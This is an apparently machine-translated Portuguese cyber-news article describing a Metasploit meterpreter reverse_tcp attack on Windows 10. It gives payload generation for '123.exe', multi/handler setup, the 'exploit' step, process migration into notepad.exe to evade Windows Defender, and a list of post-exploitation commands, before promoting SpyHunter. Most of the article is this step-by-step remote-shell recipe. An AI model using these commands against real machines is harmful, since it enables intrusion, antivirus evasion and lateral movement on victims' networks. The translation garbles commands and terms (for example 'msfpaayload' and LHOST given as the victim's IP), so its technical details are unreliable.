Casa > cibernético Notícias > Janelas críticas 10 Vulnerabilidade - Multihandler Exploit
CYBER NEWS

crítica Windows 10 Vulnerabilidade - Multihandler Exploit

Nome troiano:Win32 / Swrort
Tipo troiano
Pequena descrição Ler e escrever permissões no Windows 10. Permite que o atacante para infectar outro PC conectado à uma infectado.
Os sintomas Aparecimento de um arquivo .exe desconhecida.
distribuição Método mails de spam. ataques MITM, redirecionamentos maliciosos.
ferramenta de detecção Baixar SpyHunter, Para ver se o sistema tiver sido afetada por Trojan:Win32 / Swrort

p15_0000A perigosa façanha foi descoberto no Windows 10, usando um troiano:Win32 / Swrort para ignorar o Windows Defender e leitura ganho e escrever permissões. Anonymous pesquisador demonstrou a vulnerabilidade de um canal, chamado Metasploitstation. Ele mostra 3 fases em que você pode deslizar passado do Windows 10 defesas. Não houve informações descoberto até agora sobre se esta façanha foi corrigido ou nenhuma.

janelas 10 Multihandler Exploit Infection – Como fazer isso?

No vídeo, o usuário tech-savvy demonstrou uma simulação de um arquivo ‘123.EXE’ que ele cria e executa como se ele foi aberto no mundo real como um anexo a um e-mail ou executados por outro método. Decidimos dividir o processo de infecção em três fases para ajudar você a entender melhor a metodologia.

Estágio 1: Preparação arquivo

O hacker cria uma carga útil com essa configuração em um ambiente Linux:

janelas msfpaayload / meterpreter / reverse_tcp LHOST = LPORT = x> / home / awer / New folder / 123.exe

portnumber1 * – Esta é a porta utilizada para o ataque. Ele pode ser qualquer porta (4444, 4324, etc.). Temos escrito portnumber1 desde que ele usa uma segunda portnumber que chamamos depois.

Após esta fase está completa e o arquivo é criado pelo atacante e caiu sobre o sistema do usuário, o atacante pode proceder à Fase 2.

Estágio 2: Usando o exploit.

Neste ponto, o invasor usa o multihandler para fazer com que visualize o .exe e aproveite a exploração para abrir uma sessão ativa(conectar) para o PC da vítima.

Isso pode acontecer usando as linhas de comando atuais:

msfconsole (Para iniciar o console. Abre a interface ‘msf>’)

Em 'msf', o invasor pode executar os seguintes comandos:

msf> use exploit / multi / handler
definir lhost 'endereço IP da vítima’
definir lport ‘portnumber1’

Depois disso, o invasor executa a carga útil para estabelecer uma sessão:

msfexploit(manipulador)> definir janelas de carga útil / meterpreter / reverse_tcp

Para verificar se uma sessão ativa é possível, o invasor escreve o comando msfexploit(manipulador)> mostrar opções que permitem que ele veja isso

→Processo EXITFUNC sim Técnica de saída(aceitaram: Vejo, fio..)
Endereço IP da vítima LHOST sim A porta de escuta
LPORT portnumber1 sim O endereço de escuta

Isso permite que ele veja se configurou as configurações corretamente e pode prosseguir com a infecção real do computador.

Estágio 3: Infecção

O comando que o atacante usa para iniciar uma sessão ativa com a vítima é 'explorar'. Depois de executar este comando, o arquivo ‘123.exe’ retornou com esta resposta:

[*] Manipulador reverso iniciado em
[*] Iniciando o manipulador de carga útil…

Neste ponto, o executável foi iniciado na máquina Windows. Apesar do software Windows Defender estar em execução, não parou o ataque. No entanto, quando verificado em busca de vírus, o programa antivírus do Windows detectou imediatamente ‘123.exe’ como um Trojan:Win32 / Swrort.A.

Para evitar a detecção, o atacante usou uma tática, chamado de migração, que criou um arquivo ‘notepad.exe’ que migra a sessão ativa de ‘123.exe’ para este arquivo ao conectar. Isso foi feito usando o comando:

meterpreter> executar post / windows / manage / migrate

Depois de migrar o processo e repetir a mesma simulação, mas usando (porto diferente), o atacante estava de novo. Desta vez, quando o invasor entrou no PC, ele não foi detectado, mesmo depois que o Windows Defender fez uma verificação e o arquivo ‘123.exe’ ainda estava presente no computador.

De lá, o invasor demonstrou permissões completas de leitura e gravação criando uma nova pasta com um novo documento de texto. Tanto quanto sabemos os principais comandos que podem ser usados ​​após a conexão são:

> sysinfo - para mostrar a versão do sistema e informações.
> você :/ – para abrir qualquer diretório de destino.
> shell - para mostrar a versão do Windows e outras informações.
> getwid - mostra o Windows ID.
> ps –aux - exibe todos os arquivos .exe em execução no Gerenciador de Tarefas do Windows.
> ifconfig - exibe informações sobre interfaces (Endereços IP e outras informações). Este comando fornece ao invasor as informações para se conectar a outro computador que esteja na mesma NIC e VLAN do PC infectado. Isso pode ser muito devastador para redes domésticas ou de escritório, caso esse ataque seja bem organizado.

janelas 10 exploits – Conclusão

Não há informações reais sobre se este exploit foi corrigido ou não, mas como com qualquer outro software, pode haver mais descobertos. É por isso que caso você esteja usando o Windows 10, recomendamos baixar e instalar o programa de proteção contra malware avançado. Ele irá protegê-lo ativamente e se atualizar regularmente com as ameaças mais recentes. Além disso, tal programa tem escudos ativos que detectam imediatamente quaisquer conexões não autorizadas.

donload_now_250
digitalizador Spy Hunter só irá detectar a ameaça. Se você quiser a ameaça de ser removido automaticamente, você precisa comprar a versão completa da ferramenta anti-malware.Saiba Mais Sobre SpyHunter Anti-Malware Ferramenta / Como desinstalar o SpyHunter

Berta Bilbao

Berta é um pesquisador de malware dedicado, sonhando para um espaço cibernético mais seguro. Seu fascínio com a segurança de TI começou há alguns anos atrás, quando um malware bloqueado la fora de seu próprio computador.

mais Posts

Deixe um comentário

seu endereço de e-mail não será publicado. Campos obrigatórios são marcados *

Este site utiliza cookies para melhorar a experiência do usuário. Ao utilizar o nosso site você concorda com todos os cookies de acordo com o nosso Política de Privacidade.
Concordo